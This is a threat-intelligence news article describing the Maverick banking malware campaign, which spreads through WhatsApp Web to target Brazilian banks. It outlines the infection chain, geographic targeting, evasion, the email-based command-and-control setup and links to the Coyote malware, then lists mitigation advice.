Maverick Malware Exploits WhatsApp to Target Brazilian Banks
A sophisticated malware campaign has emerged, leveraging WhatsApp Web to disseminate a malicious program named Maverick, specifically targeting Brazilian banking institutions. This campaign, orchestrated by the threat actor known as Water Saci, employs a multi-stage attack strategy to infiltrate systems and compromise sensitive financial data.
Initial Infection Vector
The attack begins with the distribution of a ZIP archive via WhatsApp Web. This archive contains a Windows shortcut (LNK) file that, when executed, initiates a command-line interface to download a PowerShell script from an external server. This script is designed to disable security measures such as Microsoft Defender Antivirus and User Account Control (UAC), paving the way for the deployment of the primary malware components: SORVEPOTEL and Maverick.
Propagation Mechanism
SORVEPOTEL serves as a self-propagating agent, exploiting the trust inherent in WhatsApp communications. Once installed, it monitors the user’s WhatsApp Web sessions and sends the malicious ZIP file to all contacts and groups, facilitating rapid and widespread dissemination. This method not only increases the malware’s reach but also enhances its credibility, as recipients are more likely to trust files received from known contacts.
Targeted Surveillance and Data Exfiltration
Maverick is engineered to monitor active browser tabs, specifically seeking URLs associated with a predefined list of financial institutions in Latin America. Upon detecting a match, it establishes communication with a remote command-and-control (C2) server to receive further instructions. These directives may include capturing system information, taking screenshots, logging keystrokes, and presenting phishing pages designed to harvest banking credentials.
Geographical Targeting and Evasion Techniques
To ensure its operations remain focused on Brazilian users, Maverick incorporates several checks to confirm the victim’s location. It verifies the system’s time zone, language settings, region, and date and time format. If these parameters do not align with Brazilian settings, the malware terminates its execution, thereby reducing the risk of detection and analysis outside its intended target area.
Advanced Evasion and Persistence Strategies
The malware employs sophisticated techniques to evade detection and maintain persistence within infected systems. It utilizes anti-analysis methods to identify the presence of reverse engineering tools and will self-terminate if such tools are detected. Additionally, the malware establishes multiple persistence mechanisms, ensuring it remains active even after system reboots or attempts at removal.
Command-and-Control Infrastructure
A notable aspect of this campaign is its use of an email-based C2 infrastructure. This approach allows the threat actors to manage the malware in real-time, including pausing, resuming, and monitoring the campaign’s progress. By converting infected machines into components of a botnet, the attackers can coordinate dynamic operations across multiple endpoints, enhancing the campaign’s effectiveness and resilience.
Potential Links to Previous Campaigns
Cybersecurity researchers have observed similarities between Maverick and a previously identified banking malware known as Coyote. Both are written in .NET, target Brazilian users and banks, and share functionalities such as decrypting targeted banking URLs and monitoring banking applications. Notably, both malware strains possess the capability to spread through WhatsApp Web, suggesting a possible evolution or adaptation of tactics by the threat actors.
Implications for Financial Institutions and Users
The emergence of Maverick underscores the evolving tactics of cybercriminals in targeting financial institutions and their customers. By exploiting trusted communication platforms like WhatsApp, attackers can achieve rapid and widespread distribution of malware, increasing the likelihood of successful infections. Financial institutions must enhance their security measures, including monitoring for unusual activities and educating customers about the risks of unsolicited files and messages.
Recommendations for Mitigation
To mitigate the risks associated with this malware campaign, users and organizations should consider the following measures:
1. Exercise Caution with Unsolicited Files: Avoid opening files or clicking on links received from unknown or unverified sources, even if they appear to come from known contacts.
2. Keep Software Updated: Regularly update operating systems, browsers, and security software to patch vulnerabilities that could be exploited by malware.
3. Implement Robust Security Solutions: Utilize comprehensive security solutions that offer real-time protection against malware and phishing attempts.
4. Educate Users: Provide training and resources to help users recognize phishing attempts and understand the importance of cybersecurity best practices.
5. Monitor Network Traffic: Implement network monitoring to detect unusual activities that may indicate a malware infection or data exfiltration.
By adopting these proactive measures, individuals and organizations can reduce their susceptibility to malware campaigns like Maverick and protect sensitive financial information from unauthorized access.
